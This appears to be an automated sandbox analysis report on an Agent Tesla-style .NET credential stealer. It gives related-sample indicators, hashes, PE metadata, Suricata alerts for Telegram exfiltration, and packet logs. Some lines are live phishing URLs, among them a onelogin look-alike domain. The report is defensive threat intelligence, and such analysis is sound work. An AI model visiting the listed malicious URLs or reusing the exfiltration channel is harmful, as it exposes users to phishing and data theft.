                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                        104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                        • api.ipify.org/
                                                        perfcc.elfGet hashmaliciousXmrigBrowse
                                                        • api.ipify.org/
                                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                        • api.ipify.org/
                                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                        • api.ipify.org/
                                                        hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        api.ipify.orgBiocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 104.26.13.205
                                                        skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                        • 104.26.13.205
                                                        Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 104.26.12.205
                                                        z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                        • 172.67.74.152
                                                        Purchase Order PO61000016222.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.13.205
                                                        MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.13.205
                                                        MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 104.26.13.205
                                                        INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 172.67.74.152
                                                        api.telegram.orgFactura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                        • 149.154.167.220
                                                        app64.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                        • 149.154.167.220

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TELEGRAMRUFactura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                        • 149.154.167.220
                                                        app64.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                        • 149.154.167.220
                                                        CLOUDFLARENETUShttps://zastromts.za.com/v3oX/#EGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.11.102
                                                        Receipt.htmGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                        • 104.18.91.62
                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 172.64.41.3
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.97.3
                                                        weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                        • 104.18.90.62
                                                        https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                        • 104.17.25.14
                                                        https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                        • 104.18.91.62
                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 172.67.145.203
                                                        Review_&_Aprove_Your_Next_Payroll84633.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.17.25.14

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0ehttp://ffcu.onlineGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963Get hashmaliciousKnowBe4Browse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        Review_&_Aprove_Your_Next_Payroll84633.htmlGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        0T32Kz4dZU.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        https://storage.googleapis.com/inbound-mail-attachments-prod/5e015eec-2063-4653-b543-a2fdc4c2725e?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1761388993&Signature=Oqe%2BJFHcrdG7YCkrE3C6Zz6OLCYLhBuVvPPylkjCYGmey41qx66XjqVVSGCLAMzo5SzdjLX9iaWGDKggE5%2BSVyTp%2B4Pp9hiCYEhCbzJzRObttu74xvBHPG1HUvGwyhKfE3KbJMo6s3eIKayqjRRl9ive1ntsdNaFkXskMlbkDDitCjrgmc09BMh3GNgCZmS%2B%2F6W4Hs1%2FBX1s3JEpbIGaBotrI7KKcK%2Bk0eqEvy1FwgCCaSUDTZl1b6RyonBWqWQVoOT9UDFVSH5CfVKF4DfFfka0acdeYb2Y34WyRy8cCZlWDImJo52Hcg2wugU%2BJragJQbGJ2SdK6G4yy3Ak%2BGX%2FQ%3D%3DGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205
                                                        9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                                        • 149.154.167.220
                                                        • 104.26.12.205

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):226
                                                        Entropy (8bit):5.360398796477698
                                                        Encrypted:false
                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                        MD5:3A8957C6382192B71471BD14359D0B12
                                                        SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                        SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                        SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):4.12183450055652
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                                                        File size:860'672 bytes
                                                        MD5:34f978912d45ce5df9309990ecfb0232
                                                        SHA1:05505050b157f8fe6da04a06484835f75c8f0bdc
                                                        SHA256:89456271970de32ecdfadbfada5c9ef76d75cc3b2fd7bf0b36c1cf14167117fd
                                                        SHA512:dd73c32b081b1f585781ad1b699a861e9518da987c4bd0bf3fcbd4d89868a7005ef62523777f300115325b1e9b1c9a6040c1d9c882f1868ce7a2b20406eed9dc
                                                        SSDEEP:6144:PxiBwnO+ndhCFIjsoVBiy01XuAfzebFaW7ZnuMvFKLPxorZi0m3lD+jA:PJnnt7Zqsm3lD6
                                                        TLSH:4905999E245A004FF4B6AB681B50F575D1D6E2FD37CB5AB244231A660331B41A8FE3F2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g................................. ...@....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:51525373611d461b

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4c2ede
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x67220585 [Wed Oct 30 10:08:05 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc2e840x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x10dc0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xc0ee40xc1000c325e85fd0b918c28810d58eb265e3d6False0.22620957132448186data3.808009600285966IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc40000x10dc00x10e000efd292f5a328605c13130de497ba32bFalse0.20866608796296296data4.933201378904148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xd60000xc0x2000500be52f3e878ceafee825f0c751e7cFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc43900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.2025907961670413
                                                        RT_GROUP_ICON0xd4bb80x14data1.25
                                                        RT_VERSION0xc41300x25cdata0.4586092715231788
                                                        RT_MANIFEST0xd4bd00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-30T16:23:07.471899+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449737149.154.167.220443TCP
                                                        2024-10-30T16:23:07.471899+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449737149.154.167.220443TCP
                                                        2024-10-30T16:24:40.569660+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449958149.154.167.220443TCP
                                                        2024-10-30T16:24:56.090448+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450006149.154.167.220443TCP
                                                        2024-10-30T16:25:11.087794+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450007149.154.167.220443TCP
                                                        2024-10-30T16:25:13.983975+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450008149.154.167.220443TCP
                                                        2024-10-30T16:25:22.964661+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450010149.154.167.220443TCP
                                                        2024-10-30T16:25:23.176038+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450011149.154.167.220443TCP
                                                        2024-10-30T16:25:38.033265+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450013149.154.167.220443TCP
                                                        2024-10-30T16:25:38.096839+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450014149.154.167.220443TCP
                                                        2024-10-30T16:25:43.761955+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450015149.154.167.220443TCP
                                                        2024-10-30T16:25:45.656405+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450016149.154.167.220443TCP
                                                        2024-10-30T16:25:52.335815+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450017149.154.167.220443TCP
                                                        2024-10-30T16:25:55.536826+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450018149.154.167.220443TCP
                                                        2024-10-30T16:26:03.795139+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450019149.154.167.220443TCP
                                                        2024-10-30T16:26:25.527591+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450020149.154.167.220443TCP
                                                        2024-10-30T16:26:40.854623+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450021149.154.167.220443TCP
                                                        2024-10-30T16:26:59.947693+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.450022149.154.167.220443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 30, 2024 16:23:03.026257038 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:03.026287079 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:03.026356936 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:03.048283100 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:03.048296928 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.058621883 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.058784008 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:04.066663980 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:04.066682100 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.067106009 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.111824036 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:04.201348066 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:04.247370005 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.377547026 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.377628088 CET44349736104.26.12.205192.168.2.4
                                                        Oct 30, 2024 16:23:04.378412962 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:04.408179998 CET49736443192.168.2.4104.26.12.205
                                                        Oct 30, 2024 16:23:06.133153915 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:06.133194923 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:06.133296967 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:06.133642912 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:06.133657932 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:06.981703043 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:06.981848001 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:06.983900070 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:06.983921051 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:06.984262943 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:06.985851049 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:07.031348944 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:07.229988098 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:07.230453968 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:07.230493069 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:07.471884012 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:07.514153957 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:23:07.514265060 CET44349737149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:23:07.514355898 CET49737443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:39.424690008 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:39.424712896 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:39.424827099 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:39.425328016 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:39.425338984 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.291152000 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.291224003 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.295491934 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.295509100 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.296034098 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.299094915 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.343332052 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.568507910 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.568926096 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.568958044 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.569056034 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.569066048 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:40.569164038 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:40.569263935 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:41.118953943 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:41.119808912 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:41.119901896 CET44349958149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:41.120017052 CET49958443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:54.971565008 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:54.971620083 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:54.971883059 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:54.972223043 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:54.972246885 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:55.828332901 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:55.828402996 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:55.830501080 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:55.830507040 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:55.830982924 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:55.832679987 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:55.875334978 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.089627028 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.089984894 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:56.090014935 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.090106010 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:56.090136051 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.090230942 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:56.090316057 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.617701054 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.618324041 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:24:56.618379116 CET44350006149.154.167.220192.168.2.4
                                                        Oct 30, 2024 16:24:56.618540049 CET50006443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:25:09.921099901 CET50007443192.168.2.4149.154.167.220
                                                        Oct 30, 2024 16:25:09.921219110 CET44350007149.154.167.220192.168.2.4
